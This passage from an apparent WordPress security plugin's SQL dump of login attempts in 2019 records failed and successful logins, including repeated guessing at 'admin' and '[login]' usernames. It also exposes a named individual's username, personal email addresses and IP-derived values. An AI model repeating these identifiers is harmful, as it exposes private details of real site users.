CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1466,8007,1564671961.379459,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1467,8007,1564671961.405956,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1468,8008,1564671986.583577,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1469,8008,1564671986.594881,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1470,8009,1564672013.105675,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1471,8010,1564672026.536462,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1472,8011,1564672302.762723,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1473,8011,1564672302.780587,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1474,8012,1564672308.689202,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i%','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1475,8013,1564673793.732813,1,'loginFailInvalidUsername','Mphojulie060@gmail.com',0,'\0\0\0\0\0\0\0\0\0\0i!','Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-A605F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36'),(1476,8015,1564678402.911075,1,'loginFailInvalidUsername','Vonty77',0,'\0\0\0\0\0\0\0\0\0\0f\0','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36'),(1477,8016,1564678685.410138,1,'loginFailInvalidUsername','vonty77@gmail.com',0,'\0\0\0\0\0\0\0\0\0\0f\0','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36'),(1478,8017,1564678689.522677,1,'loginFailInvalidUsername','vonty77@gmail.com',0,'\0\0\0\0\0\0\0\0\0\0f\0','Mozilla/5.0 (Linux; Android 7.0; BND-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Mobile Safari/537.36'),(1479,8152,1564732986.124188,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1480,8153,1564733457.877147,1,'loginFailValidUsername','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1481,8154,1564733468.349749,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1482,8160,1564987275.397459,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1483,8162,1565015678.484184,0,'loginOK','Shop Manager',2,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1484,8165,1565036870.951088,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1485,8166,1565036877.620458,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1486,8167,1565036889.939765,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1487,8168,1565078720.974818,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1488,8169,1565087740.570317,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1489,8170,1565087749.849768,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1490,8171,1565169206.482837,0,'loginOK','PayfastU',4,'\0\0\0\0\0\0\0\0\0\0ş%','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36'),(1491,8172,1565170221.047209,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1492,8173,1565180022.437455,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1493,8174,1565180022.439819,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\02;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1494,8177,1565180121.452720,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0}','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1495,8178,1565180210.963378,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\027','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1496,8179,1565180211.294106,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0g9e','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1497,8180,1565180257.995271,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0myF','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1498,8181,1565180258.081017,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h?','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1499,8182,1565180307.988557,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0EA','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1500,8183,1565180308.167382,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0q\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1501,8184,1565180424.274979,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0ʚ:','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1502,8185,1565180566.223680,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0\rz','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1503,8187,1565180585.665912,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1504,8189,1565180659.979343,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1505,8191,1565180806.230859,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ge\r','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1506,8193,1565180807.722083,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0H	','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1507,8194,1565180908.369256,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0G+','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1508,8195,1565181029.819136,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.B','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1509,8197,1565181312.466448,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1510,8198,1565181450.816103,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0-(','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(1511,8199,1565251227.799014,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1512,8200,1565265713.106563,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0)U','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1513,8201,1565265718.327046,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0)U','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1514,8202,1565265723.878983,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0)U','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1515,8203,1565265735.228179,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0)U','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1516,8204,1565351286.071486,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0@','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1;)'),(1517,8205,1565677982.771981,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1518,8207,1565708787.300976,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i8','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1519,8208,1565708794.232531,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0i8','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1520,8209,1565709014.892673,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; MS-RTC LM 8; .NET CLR 1.1.4322)'),(1521,8210,1565764831.547828,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1522,8211,1565852614.550458,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1523,8212,1565853092.797542,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1524,8213,1565853099.207973,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1525,8214,1565853112.009039,1,'loginFailInvalidUsername','companyregistrator',0,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1526,8215,1565853127.479762,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1527,8216,1565853683.520789,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G3','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1528,8217,1565897478.281218,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0[/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1529,8218,1565898240.971202,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0%kK','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1530,8219,1565898876.796236,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0|J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1531,8220,1565900763.499542,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1532,8221,1565901279.677703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\048','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1533,8222,1565902713.977854,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0hk7','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1534,8223,1565904138.264137,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0m\Z3','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1535,8224,1565905638.501278,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0dM','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1536,8225,1565908573.807920,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;,','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1537,8226,1565909940.904587,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1538,8227,1565912629.317913,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0%kK','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1539,8228,1565913408.928078,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\06X&','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1540,8242,1565937391.864230,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1541,8367,1566197432.491541,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'),(1542,8368,1566287532.572381,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1543,8370,1566292606.857293,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1544,8371,1566364637.145673,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0hI','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1545,8372,1566366774.118454,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1546,8373,1566367858.673366,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Ac&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1547,8374,1566370174.808166,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0[K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1548,8375,1566371273.698438,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>jr','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1549,8376,1566372490.723151,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0/y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1550,8377,1566373647.221410,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0gJ{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1551,8378,1566379477.222333,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1552,8379,1566380649.324435,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1553,8380,1566384254.302448,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0@','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1554,8381,1566385486.661194,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\04--','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1555,8382,1566386717.714788,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>-\'','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1556,8383,1566389166.692992,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1557,8384,1566390431.461931,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1558,8385,1566391678.089688,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ҭ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1559,8386,1566394976.795807,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"繬','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1560,8387,1566396958.646957,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>c]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1561,8388,1566399032.059170,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0	B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1562,8389,1566400114.016178,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1563,8390,1566401096.922915,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1564,8391,1566403285.722412,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1565,8392,1566404274.299871,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1566,8393,1566405316.659157,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1567,8394,1566406430.256742,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0kR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1568,8395,1566408553.978935,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0/K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1569,8396,1566410684.929102,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1570,8397,1566411876.539581,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\04N2C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1571,8398,1566415109.793328,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\ra','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1572,8399,1566417287.099570,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1573,8400,1566418431.660136,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1574,8401,1566419562.960485,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1575,8402,1566422936.899968,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1576,8403,1566425306.837077,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0/K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1577,8404,1566426340.742805,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1578,8405,1566429490.102420,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0gMjB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1579,8406,1566430593.741880,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0hk7','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1580,8407,1566432980.807389,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0>sf','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1581,8408,1566434091.408750,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0E\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1582,8409,1566437612.244887,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1583,8410,1566438759.873997,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0D9','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1'),(1584,8411,1566442349.887804,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0E\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1585,8412,1566443363.599718,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0l=F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1586,8413,1566445920.340686,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 